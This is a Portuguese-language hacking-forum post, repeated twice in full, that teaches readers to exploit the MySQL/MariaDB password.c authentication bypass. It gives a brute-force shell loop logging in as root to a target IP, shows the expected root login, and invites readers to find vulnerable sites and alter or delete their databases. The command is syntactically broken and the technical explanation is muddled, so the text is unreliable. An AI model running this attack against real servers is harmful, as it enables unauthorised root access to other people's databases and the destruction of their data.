ELA SOMENTE FUNCIONA EM SOs DA FAMÍLIA UNIX!!!
Ola pessoal, este vai ser o meu primeiro tópico no Guia do Hacker, tomara que vcs gostem dessa tópico.
O que eu devo saber antes de tudo?
Que ela SÓ funciona nas seguintes versões de MySql e MariaDB:
- 5.1.61
- 5.2.11
- 5.3.5
- 5.5.22
Bem somente isso que você devera saber ate agora sobre a Vulnerabilidade.
Como achar um site vulnerável a isso?
Não existe dork para esse tipo de vulnerabilidade, você mesmo terá que achar um site com essa vulnerabilidade, e para ver se um site e vulnerável, use programas para analisar as vulnerabilidades como Nessus, Nikito, entre outros.......
O Que e a Vulnerabilidade MariaDB/password.c?
Bem, ela ocorre quando o server MySql da acesso ao root para o atacante sem Autenticação, quando o atacante se conecta com o Server MySql , é perguntado a ele o Usuario e a Senha, quando "root" e o Usuario, que infelizmente o Administrador não deu a devida atenção ao nome e acaba deixando do jeito como veio, a senha que e digitada foi mandada para a função memcmp() que compara o valor digitado com o valor real.Mas e observado que quando o atacante tenta acessar o Server remotamente, o Server da a ele 300 tentativas, um valor que não e zero faz com que a função não interprete bem por causa do chamado incorreto. Por isso que o Atacante ganha acesso completo ao usuário root do server MySql, dando o nome a e essa vulnerabilidade de MySql/MariaDB /password.c.
Como usar essa vulnerabilidade?
Bem aqui começamos a Exploitar a Vulnerabilidade , espero que tenha compreendido tudo o que eu expliquei acima para ter mais facilidade em entender como utilizar a vulnerabilidade, preste bastante atenção nas instruções abaixo para fazer o ataque e ganhar controle total do Server MySql .
Instruçoes:
1- Execute o Terminal do seu SO.
2- Coloque o Seguinte comando: "for i in 'seq 1 1000'; do mysql -u root --password=bad -h 172.0.20.1 2>/dev/null"
Agora vamos explorar um pouco o código acima, Primeiro, ele aplica um loop com uma sequencia de 1000 vezes para rodar o comando "mysql -u root --password=bad -h 172.0.20.1", o parametro -u define que o "root" e a senha e igualada.
3- Depois de executar o comando acima, devera aparecer algo parecido:
Welcome to MySQL monitor. Command end with ; or \g.
Your MySQL connection id is 2313
Server version: 5.3.5-0ubuntu1 (Ubuntu)
Copyright (c) 2012, 2013
Pronto e isso, agora vc tem total a database MySql no server, agora vc pode usar comandos de SQL para manipular e deletar os conteúdos da database.
Blz, galera e isso espero que vcs aproveitem essa vulnerabilidade pouco conhecida, mas quando se acha um site com essa vulnerabilidade você já saberá o que fazer!!!, clique em obrigado por favor se vocês tiverem gostado.
Ola pessoal, este vai ser o meu primeiro tópico no Guia do Hacker, tomara que vcs gostem dessa tópico.
O que eu devo saber antes de tudo?
Que ela SÓ funciona nas seguintes versões de MySql e MariaDB:
- 5.1.61
- 5.2.11
- 5.3.5
- 5.5.22
Bem somente isso que você devera saber ate agora sobre a Vulnerabilidade.
Como achar um site vulnerável a isso?
Não existe dork para esse tipo de vulnerabilidade, você mesmo terá que achar um site com essa vulnerabilidade, e para ver se um site e vulnerável, use programas para analisar as vulnerabilidades como Nessus, Nikito, entre outros.......
O Que e a Vulnerabilidade MariaDB/password.c?
Bem, ela ocorre quando o server MySql da acesso ao root para o atacante sem Autenticação, quando o atacante se conecta com o Server MySql , é perguntado a ele o Usuario e a Senha, quando "root" e o Usuario, que infelizmente o Administrador não deu a devida atenção ao nome e acaba deixando do jeito como veio, a senha que e digitada foi mandada para a função memcmp() que compara o valor digitado com o valor real.Mas e observado que quando o atacante tenta acessar o Server remotamente, o Server da a ele 300 tentativas, um valor que não e zero faz com que a função não interprete bem por causa do chamado incorreto. Por isso que o Atacante ganha acesso completo ao usuário root do server MySql, dando o nome a e essa vulnerabilidade de MySql/MariaDB /password.c.
Como usar essa vulnerabilidade?
Bem aqui começamos a Exploitar a Vulnerabilidade , espero que tenha compreendido tudo o que eu expliquei acima para ter mais facilidade em entender como utilizar a vulnerabilidade, preste bastante atenção nas instruções abaixo para fazer o ataque e ganhar controle total do Server MySql .
Instruçoes:
1- Execute o Terminal do seu SO.
2- Coloque o Seguinte comando: "for i in 'seq 1 1000'; do mysql -u root --password=bad -h 172.0.20.1 2>/dev/null"
Agora vamos explorar um pouco o código acima, Primeiro, ele aplica um loop com uma sequencia de 1000 vezes para rodar o comando "mysql -u root --password=bad -h 172.0.20.1", o parametro -u define que o "root" e a senha e igualada.
3- Depois de executar o comando acima, devera aparecer algo parecido:
Welcome to MySQL monitor. Command end with ; or \g.
Your MySQL connection id is 2313
Server version: 5.3.5-0ubuntu1 (Ubuntu)
Copyright (c) 2012, 2013
Pronto e isso, agora vc tem total a database MySql no server, agora vc pode usar comandos de SQL para manipular e deletar os conteúdos da database.
Blz, galera e isso espero que vcs aproveitem essa vulnerabilidade pouco conhecida, mas quando se acha um site com essa vulnerabilidade você já saberá o que fazer!!!, clique em obrigado por favor se vocês tiverem gostado.